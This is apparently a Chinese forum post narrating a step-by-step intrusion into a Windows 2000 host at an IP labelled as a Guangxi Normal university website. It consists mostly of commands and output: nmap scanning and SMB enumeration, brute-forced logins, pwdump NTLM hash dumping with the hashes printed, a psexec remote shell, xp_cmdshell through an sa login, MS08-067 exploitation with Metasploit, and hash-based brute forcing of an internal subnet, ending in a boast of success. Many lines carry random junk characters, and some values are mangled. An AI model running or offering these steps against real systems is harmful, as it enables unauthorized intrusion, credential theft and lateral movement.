广西师范网站http://202.103.242.241/& s' j& z, A8 J6 j* o
" p" r/ t) }* M- w1 e% o% T8 @
root@bt:~# nmap -sS -sV 202.103.242.241
5 z ^; \+ Q. _: K, c" ?) u# g! A2 `: N( _
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST* }( ~! e* E4 v5 N; l* W4 B
. N: e9 X7 i4 f; ^
Nmap scan report for bogon (202.103.242.241)9 v& Q6 M1 |# ^
* _( \ F# f3 n5 C( P3 wHost is up (0.00048s latency).6 g' G q3 T- O' R" T9 d, ?: |
9 ^6 ~3 x2 v. h8 K/ T+ U6 j
Not shown: 993 closed ports) P2 W1 ^1 C2 u7 N$ V" d/ f
7 t$ s' I; w* c$ R# ?
PORT STATE SERVICE VERSION! k7 N4 Z1 L8 F; t
$ i0 j- s' z& f# J5 V* |135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) g' Z6 J5 z C w
0 T- I" Q6 n/ t* R$ v
139/tcp open netbios-ssn
6 Y1 @6 W" y9 @1 _5 U' ~7 M7 N
1 s! ~) W9 P9 ]5 }445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) E' b6 Z& r3 r% h; r
z- j7 x7 s4 i1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) s: a" @* i4 r4 Y6 s- H, C1 V' w& n
9 F0 P. _) F3 `! `/ s1026/tcp open msrpc Microsoft Windows RPC
$ Z8 y1 ^, Z$ x6 F% l+ N, [* I/ h7 V" A( H6 C2 ]( u
3372/tcp open msdtc?( U: {+ v7 \+ b f3 H
5 x5 z4 J9 N, _" r! n3389/tcp open ms-term-serv?
. t9 j8 w) ?/ A3 [+ ~" w8 Y% c( N+ Y2 [. y! X, y1 z/ X0 t
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :1 R1 I7 s0 K6 T$ x* ~
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
1 p8 S2 H3 E6 b, l. p: P
9 N# ?0 M: x: ^; L, ^; t, O- A8 F. zSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions$ |+ N- B9 `5 y) b, F
5 b7 l! ~. {% H- `! G! w& d
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
% O9 ]- _( I N+ }8 x- t
! P; f8 e0 ~; v' hSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO8 D' `2 ]% c* h: {7 H9 t
- o+ N$ w4 Y1 J" X/ a j( ]7 r3 J SSF:ptions,6,”hO\n\x000Z”);
/ k0 a$ m( w9 X. s% E: N# t. c/ W+ U6 J; x
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
* ~& X. K7 L' Y2 L$ A
$ d1 ^) u$ h8 W) y( \Service Info: OS: Windows
5 Z; b- n- n7 K* v
4 N' a4 d7 t! Y. [+ L. ?Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
- z1 d, \$ M8 ~ G6 y8 x/ {/ \0 F6 |
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds6 c8 T( {- P* X- l- N% z
7 o; W! s G+ ]root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本1 y9 _9 @0 P1 P# R
1 N$ s5 ] ? u' L; U-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse) l2 m4 ]" h4 j4 C0 a( n' R( R: W& ]
5 q& p _/ Y2 [- c2 @. q; H& O3 W7 E-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse7 d7 V: u, J o- O: \
- e( f! j( j8 l& Y4 _& |0 g
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
9 p5 p' S+ n. E' a. ]+ Z" e; w$ X4 m9 U) g3 q% v
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse) I+ r- u+ W7 Q/ d
* J2 j5 e6 r# u4 D, j
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
, l0 X8 j2 U5 r1 F R/ R/ Q- \# T7 q6 L. D2 G# B! D- A1 W
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse- X" z9 i- F, X# Z. H ]
9 t1 g3 e- i& E k# i-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
: u( R$ E1 C& n' [! {
# o2 n5 K, R- B! U6 k4 R1 c-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse& R1 [& g4 D8 E8 h1 V4 ^
# w& Q$ S' M- s# Z; \9 [-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
6 _8 _: W& \* A6 f! y7 x$ V/ D0 X) v/ F; O# N
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse* p7 n+ `6 A/ L! q+ A. c3 t2 m
2 g4 W' ^- a8 r+ `-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse/ K Q4 |. H2 w2 ]5 t& W- D
4 o+ ] a, g( S-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
) L8 e2 c3 J4 h/ a
. A% W3 ]1 y* K9 e-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse4 F3 U; E |. ^- b5 R3 ]( z, o, j
6 W+ I. {$ o7 c3 _) ]/ F
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse) q) Y2 y6 m0 Q5 t; R; \
! q% [5 y0 s1 V: n& x! X5 G-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
/ ?* K4 X! L* y! M; ?8 Y& z j" y u8 t
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
+ G5 v& D# r. q2 W( u- l7 ^
( I0 E# E) ? @; j/ o+ X' w3 }//此乃使用脚本扫描远程机器所存在的账户名2 {3 A/ P$ ~) x+ Q8 M8 g4 m
4 ~: f9 P* a; y0 E4 G% t# bStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST; c0 P( {7 p J P
( H2 J9 {( X- Z& {8 s$ fNmap scan report for bogon (202.103.242.241)
9 d. C* D% r' y/ A+ g: D \8 N. p
' D- x+ h$ [+ RHost is up (0.00038s latency).1 J8 c0 j1 d `* ?+ N: J5 S9 D- P
- W9 H b, M# R. ?2 S
Not shown: 993 closed ports
1 T5 O5 _8 ^% g
6 c/ p" m% [- B& W. f2 LPORT STATE SERVICE4 \/ \4 t) w! \
6 a I9 b1 P3 s( B$ d
135/tcp open msrpc; S# ^0 u- ?' l7 L) o* N3 w. }! M
1 t& R2 I4 [* u
139/tcp open netbios-ssn
3 x4 @5 h# { Z9 f' E, B
: C6 h0 a0 h( P y, z+ s2 `) H" ~445/tcp open microsoft-ds8 Q& f; _& H# p, s& Q) U# @
8 F" l/ t, g4 v" Z8 s1025/tcp open NFS-or-IIS' k. ?6 a! Q$ E
' a, R7 e5 F) v' _, I3 {1026/tcp open LSA-or-nterm+ f# n, f @( U# K2 R; X
( d0 N7 o! k l
3372/tcp open msdtc* L% \, E/ K* J! Q) u! p/ d% e
; a" R* s- `0 Y( V3389/tcp open ms-term-serv
7 x8 w* ]7 F+ ~0 s
0 t. w- G2 ?& w/ C2 n8 zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; q, y' U3 Z/ T/ L3 a. Q# ^! ]
' ~9 R- m( k- z) O" J0 U' c& WHost script results:
0 M/ J, v: U( p4 J! q8 `- @! p
8 r" n- v: B/ H1 A% [5 z4 _7 w$ S! v9 m| smb-enum-users:
" U- n5 S1 ^3 S% |) t$ P, @, m% I
) O/ M( Y6 f3 j. h, H|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果$ I. w% D% p4 R) v, r9 c
, i, }8 s4 R% v4 S7 LNmap done: 1 IP address (1 host up) scanned in 1.09 seconds$ f+ c1 Q9 V b7 c1 M
1 x Z! B g+ T9 v3 ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 6 F. [+ t5 t! \7 |
5 ]0 y) h! O; c" Y# `7 {4 Y//查看共享2 N* B' Z& Q6 n0 H4 X( b
5 ~4 t' N J0 T. A3 K% KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
; G" l1 ?0 j, M( d( h0 y1 i2 y* A8 q& T$ p
Nmap scan report for bogon (202.103.242.241)
6 m4 G; S* D' ?/ [* \
3 M9 T0 f8 y7 ?. b, I( EHost is up (0.00035s latency).6 R/ P2 q2 c, z% ?
; v) T. G! C. d% h8 a0 Z
Not shown: 993 closed ports7 m! Y0 L8 G4 u( ]" I. j- D2 N
( }" ? _: z6 Q- g
PORT STATE SERVICE6 T+ |! i) d1 }% R1 i0 a. ]
4 h& [8 X) S; w' j3 n
135/tcp open msrpc" l3 V8 Q4 t) F+ z4 v( v+ Q
7 w+ v6 @7 E9 P7 o6 @0 Q
139/tcp open netbios-ssn
( m+ l+ y4 ^% e/ I+ E8 ?
" U9 J8 C& A1 ^+ I2 }# G445/tcp open microsoft-ds
7 Y' T3 C. h3 a8 L6 p8 y1 a1 x9 ^6 G0 v- Q4 V( [1 x f. q* G
1025/tcp open NFS-or-IIS: Q- _( E" h1 Z$ ]1 }) a
5 }" r8 n- h/ m' r/ g, }: g. x1026/tcp open LSA-or-nterm/ Z( e. H& V, y+ Z: W# Z
% `' |- u# L9 A& ~5 E' l; C
3372/tcp open msdtc: O- [. [0 H4 x) M( j$ N }1 n
4 Q* s& ~" s3 f1 X% W
3389/tcp open ms-term-serv
9 W2 u; D# G1 ]. E% [) e6 ]4 O6 W/ U+ c. @8 Z* x+ e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 \1 e7 A7 a0 }% V) z2 r9 x# U: x. t% E0 w
Host script results:
0 S! D6 C1 d/ S* r# k. Y% W; X; F0 l3 U O
| smb-enum-shares:
7 L) ~ H/ E/ p5 a/ K/ y) H
+ v9 `6 Q+ i/ `( p& B| ADMIN$& k7 } u+ g. n
! I6 ]3 J5 X* n* I! t, j3 ~
| Anonymous access: <none>- z( D9 X/ W0 X5 k7 r9 H: t/ \9 ]
$ a* t- l! v" I+ L# i/ Q o
| C$& f% g+ [) Q3 \3 @5 l7 l
/ @" X. v% C& a/ o" I3 J| Anonymous access: <none>& ]# l! M, D% ]% W
: F' E8 G$ s R- J3 x| IPC$
: n* Z$ A! q% {3 Y# D' y' b" j+ |% h+ [% Q2 D7 X
|_ Anonymous access: READ
0 Z3 F2 o% B0 Z' l- F' @: M P7 x5 C4 T$ i4 U8 T: g/ ]
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds/ g' I2 c C+ ?9 S* a3 {
% n1 \! s6 ?( Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 3 o8 z) E; B9 k6 W( S& f
) j; m% Z; T7 W+ B1 U$ F, K9 k
//获取用户密码9 D# c' `0 E+ E8 O- {
0 v" ], E1 [) _* N& H1 |6 QStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST: @# k. ~1 R" a* R% l( e7 b/ R
9 Q, a1 q" S- f2 [% I
Nmap scan report for bogon (202.103.242.2418)
* B& ?# d- c9 I9 Z' z m) q! r4 G8 v7 t9 {7 D$ C1 y
Host is up (0.00041s latency).) w& x' P" Z4 I! v- Z3 q' q
" @' r \3 c% E4 N
Not shown: 993 closed ports- H+ n" M; B1 ~+ B- ~
5 l; @6 A- S) z+ M/ t$ p* N
PORT STATE SERVICE
7 ]7 H5 U+ b2 ~1 _% B
4 A1 @9 M$ W& N' F1 d) P; X135/tcp open msrpc
' V( ]+ a% ]$ A6 }* o0 q" Z
- }% j" ~. y6 r139/tcp open netbios-ssn$ U" b) {% ?) a _
- _. \, ~" e P* c" k" p445/tcp open microsoft-ds3 d# L* A9 Z( `+ f
6 w1 e1 @5 U3 K1025/tcp open NFS-or-IIS
) X, D6 C; e8 ~( E. `- N1 g7 Y Y0 C, Q4 K
1026/tcp open LSA-or-nterm" ?' E* B9 i3 I2 ]" V+ C+ u
' s5 C: n+ \) J' f3372/tcp open msdtc. w2 V, Z6 t ?6 _ Q1 @
3 E# N, _$ ^+ F% Z9 h3389/tcp open ms-term-serv
% P$ w# `2 f5 p+ v& ^4 x% |4 F: `8 ?( o( R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ r1 V- n+ P: z8 R- [- F. B! w3 J7 W' T8 e/ O: i
Host script results:
' A6 C$ R3 y5 b$ F [6 T" k- R5 L. L* U8 u
| smb-brute:* K& {) t7 _* a, b
/ B5 O8 ?2 C5 Z* z5 j1 [administrator:<blank> => Login was successful" X5 n; |1 \# x. V6 z8 B N
$ o: ?9 @) x+ \
|_ test:123456 => Login was successful
# V; \; o, N5 R6 Z
s8 e$ n8 h: j% M& E9 RNmap done: 1 IP address (1 host up) scanned in 28.22 seconds0 e0 _) R$ W/ c% l6 Z. N- Z
0 k3 c5 c' h; I9 K$ r; |4 A) t8 K
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash G; ?: P U3 @9 I! V2 g$ K3 S
4 N o1 a" c7 z4 froot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data& }* z: S9 j9 k) Y
2 O2 u2 U! b% L; U7 Eroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse$ [+ W7 t8 k1 }8 T- P
8 \# H/ U% c: v9 \3 O
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
& ]- u6 e% k7 p1 @( c: g& }7 j4 P" ~3 R$ l: A0 c" x
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
) i( r) ^8 P) i! |4 X- z& i- c( ^: V# a& i3 R# G
Nmap scan report for bogon (202.103.242.241)' {! a& U0 Y% B1 t
7 G5 i) O6 b. B- k2 \4 I
Host is up (0.0012s latency).; P! `8 Z. {" O0 B9 _; h V7 c
f7 e M! m% Y8 V! y4 `3 Q, w
PORT STATE SERVICE
/ G1 X, g5 `5 _, P+ m$ |4 s/ E: J- o8 g# M1 ?
135/tcp open msrpc
5 I6 F2 x5 f% D0 i
7 u. A& |% `; d$ w6 r- j4 ]) X139/tcp open netbios-ssn
$ \! |; X' C. a3 q0 c9 h
4 R: s, l5 Z; e$ X445/tcp open microsoft-ds
8 s' y$ S6 w% T! W: Z5 s/ L" j
0 b" v* M7 |3 L+ SMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 a: C' {5 j- t E' J3 ]
2 B8 m5 N, U4 I+ ]: j, H' X% bHost script results:1 d) E- p/ v! s n x
( t+ q- s% }, t9 X4 }, M4 i| smb-pwdump:7 p8 h; M* _* ?) O
$ x& L6 Z a3 }1 R$ q* R| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
9 Z o6 Y. L2 ~8 _! P& X' m% G, H- p" d5 [$ [7 V
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
; y& I0 M4 t1 S' t2 S2 Q1 R( y
9 o9 B4 P3 Q5 e9 o( s8 m0 S% Q8 Y+ t5 || test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4& K; _9 N5 X" ^, B+ g# v& z
4 l5 Z; p* p/ b/ p" Y: `1 x" `
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
- q# S1 J& |% d
4 `' R) {3 @) d) u3 Z e% J8 jNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
7 H: ?; W/ \$ r
# w T4 `/ c0 z: C- w) ]C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
4 h& p( B' ^ n# x/ l' r E9 U( y8 i- _9 ~) Y: x
-p 123456 -e cmd.exe& R( ?4 O4 L; \8 Y* L/ y% L
' @1 M+ n: h& w! nPsExec v1.55 – Execute processes remotely
& `0 ]( G' R Y' V: [ W; p3 J2 z' u& A% ^9 j) W% A* k
Copyright (C) 2001-2004 Mark Russinovich" y2 o4 x( H; g! X! d
/ Z B3 F- m& f4 W2 W' L
Sysinternals – www.sysinternals.com, Z+ ~8 t. @+ H j- b5 ~3 x. `5 `9 G
1 K e9 r- f5 w6 ^! C
Microsoft Windows 2000 [Version 5.00.2195]' t5 d/ Y P' @8 K' P
1 Q1 y1 {( u" y" Z8 U3 m(C) 版权所有 1985-2000 Microsoft Corp.
7 r' \! X7 t" h; ~% w
5 g! S% j4 R, f- ^ D( kC:\WINNT\system32>ipconfig6 } l% u2 I: n
! F% K+ I2 M9 O; J+ }1 J* k
Windows 2000 IP Configuration
3 O" V9 w7 S5 y% e0 E4 A; J! Z7 `% J" T, n- i
Ethernet adapter 本地连接:* D' c& h2 V# i$ A; q
, ~3 C" F" o: M. E8 M
Connection-specific DNS Suffix . :. k0 U* D5 { i a& B: V3 ^
Z( W; N9 D4 e
IP Address. . . . . . . . . . . . : 202.103.242.2411 S* x5 O" w# L. j; W* h% N4 D5 u( P
9 ~, [" D/ I8 O7 \3 T* |& uSubnet Mask . . . . . . . . . . . : 255.255.255.0
" Z5 g) k: q! p( w, {$ |+ W$ a" v4 w% b! B: t- ]* W g; V! L
Default Gateway . . . . . . . . . : 202.103.1.17 B/ W9 q1 r9 t9 f" ~' r
/ n: [4 U7 Q2 L8 W2 R7 ~6 XC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
# `# y- a% Q" S4 d, w' H( ^' S4 j r. @# p2 |2 V2 b- r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞9 y5 g1 N F5 [/ P2 g* B1 E. q3 I
4 w* J) @- N4 G9 CStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST T" U! `: k$ ?5 ~
7 u1 P# d8 z8 r; X+ J
Nmap scan report for bogon (202.103.242.241)% O; `7 Z3 x1 @6 U9 A2 L7 A
( X. ^1 w/ [# I7 C: i2 _) b. h+ M4 EHost is up (0.00046s latency).4 I/ x0 u( V% b. R9 J4 Y0 t. ?3 h
9 n8 o% G: h2 p
Not shown: 993 closed ports( g' ]% H! R% a8 G D9 S, v
$ l' q. @8 b' n3 B/ C* I
PORT STATE SERVICE; y9 z/ V/ X5 T5 u
4 K$ P3 _8 O! J0 a6 L* o
135/tcp open msrpc
( u% f* r( e0 J. X" p# r2 d; z) A5 ^7 S: B' K! _3 @* z$ o
139/tcp open netbios-ssn; [* Z. F5 K: q8 a2 o$ B
5 T* p: F( X9 l4 _
445/tcp open microsoft-ds" ^* k- ?, F0 X) H& `2 Z
! P+ |: E3 m+ p5 A
1025/tcp open NFS-or-IIS
. f: j# a7 k% ]7 ^' r) q3 K/ ]2 `" t& P* ?( i4 k
1026/tcp open LSA-or-nterm
; x; \9 S6 z6 g8 @5 r1 U3 x0 g' o. @: @5 A7 t7 J; {7 N6 z, D( \$ H1 c
3372/tcp open msdtc
" k5 j; |' i9 \$ b" _6 `
( p1 o% V2 q& `. p$ O3 v3389/tcp open ms-term-serv5 f, x# [1 Z( Q) j1 k- h5 y) H
3 P, y" Y$ P0 N( TMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' B5 K5 F$ z1 l' @4 ?0 H
# z) M+ Q# G# ~# M$ a1 w$ SHost script results:
# S3 p$ H9 F, a2 l, I& u8 @" n
/ i" b( _. f. r! o: f| smb-check-vulns:
; S, Z$ F$ A8 x7 ]
0 F# {0 B# ]1 z7 A" f' N7 w8 b|_ MS08-067: VULNERABLE
0 Z( S4 H3 `$ F1 G6 j/ B2 M$ M$ \+ z2 x& i
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 K% ^5 j1 x+ R" T1 Y# x
+ O1 S2 C, j, A
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出/ J/ A7 M' V& d- n6 Z4 ?* _
; b/ |$ m; d* @/ w+ k; W9 t7 y
msf > search ms08
4 M5 u/ y) |* E- {- `* j u( O. G& R- H; i7 f, n. T
msf > use exploit/windows/smb/ms08_067_netapi8 J% }( O! o* V& R1 b
6 \. {2 O0 G" h1 x
msf exploit(ms08_067_netapi) > show options4 x2 E5 w- n# g5 j8 c3 a8 d/ a9 Z0 p
( t0 @0 D5 Z0 G# g8 Vmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2419 e# a7 \# {2 G9 F4 K. G
, B4 P+ Q9 R6 _( m3 m1 z) `
msf exploit(ms08_067_netapi) > show payloads) [. A' v; [/ X4 M
/ g9 h* F e/ t* i6 c- lmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 @& K; |6 i+ ^ N& X. \/ Y
+ e4 P6 }. z# f
msf exploit(ms08_067_netapi) > exploit
1 \1 H# o7 e+ A5 O! w8 }7 L8 X0 U& b$ X; ]& U- ]' r; ]
meterpreter >
$ |, p4 g) ~% D' a
9 }6 ~5 S. g( \/ G* PBackground session 2? [y/N] (ctrl+z)
3 e4 p1 S& f4 q, x+ r1 x$ c {
. \* \. U* R8 L8 i9 B6 g0 Cmsf exploit(ms08_067_netapi) > sessions -l* f4 c: M1 ]' ?' B
" r& A0 H9 p: s' B" `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
% o0 `8 u6 W! |. K; ~8 s1 E
/ _0 R( W! ~& z" Q7 S; a* Ltest l8 k2 | T2 D. e2 b
8 \9 R' ]/ _ I( L
administrator( w! ?9 `# ]4 m( U( P
& N3 P9 ]' y# h2 {+ ?# b* D1 k8 q5 iroot@bt:/usr/local/share/nmap/scripts# vim password.txt
I' B* \6 h1 E6 b, {
3 K" o/ n' M: \1 l* b44EFCE164AB921CAAAD3B435B51404EE
9 w" o* J# W8 E0 Y
- ^1 `3 ?: h* b% troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ' i1 W. k' S& l; V& \# |/ g& P
# E! S6 { I4 j; @: Y* f1 B4 x4 y
//利用用户名跟获取的hash尝试对整段内网进行登录! r) W2 k9 ~/ ]7 X$ i9 K. z
3 k, p1 z8 I5 ^Nmap scan report for 192.168.1.105
0 \/ n8 Y- d# i& J7 c
- N* Q, ~2 ]; @! W. t. ?Host is up (0.00088s latency).
8 F7 p1 U+ j9 Y/ w. C" W+ Q
3 k* ^" a3 I' n. u" P0 F% J. oNot shown: 993 closed ports s' i3 E- U7 w8 n9 B
V% F5 I! f, ~; @$ |- A' X- a
PORT STATE SERVICE
' c- s" }9 i) d7 t
+ c, _2 Y. _7 q3 |% ~135/tcp open msrpc
4 m' l3 Y7 j7 H. k2 q" k: I
+ s; h) z5 R0 H' ~# T0 a139/tcp open netbios-ssn$ f! A, s; K# }& n
/ r/ \1 h, \: b- H
445/tcp open microsoft-ds
$ D: }- L+ j7 ] v- N# X/ D! n9 C1 E- `% h" X7 ~! M5 ?* h
1025/tcp open NFS-or-IIS0 b& { [. k$ s. B( l3 w5 X
( A; K% P5 ]' [4 c* r. v! p1026/tcp open LSA-or-nterm
7 R4 e* b# N7 X5 t$ f$ l) E5 L7 h
( J2 a6 @ D& b3372/tcp open msdtc
6 T, Q7 o* t" J4 L8 c
1 W7 X) y: i% n0 M+ s3389/tcp open ms-term-serv
0 A5 b% J" c2 Z5 V4 u a/ \! ^1 k4 j1 v6 s; ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 D3 v3 Y7 n( Z' @& ~: O
; M {4 k3 s; SHost script results:2 h1 I1 y( F$ B) `
6 a! q8 n( H* W7 H1 z& L| smb-brute:
$ _7 J7 f( V% G$ B: g) Y+ ~/ i3 M0 O; q' d7 H7 M$ X7 h6 K
|_ administrator:<blank> => Login was successful8 i6 y. g2 s! J! N+ C* S6 Z h) t
1 J5 [8 w9 a+ K! U& W! |* d7 x7 D! N) b
攻击成功,一个简单的msf+nmap攻击~~·! I1 \2 c0 N3 N4 A% M
. G o" ]) U) t6 C |
发表于 2012-12-4 12:46:42
收藏
支持
反对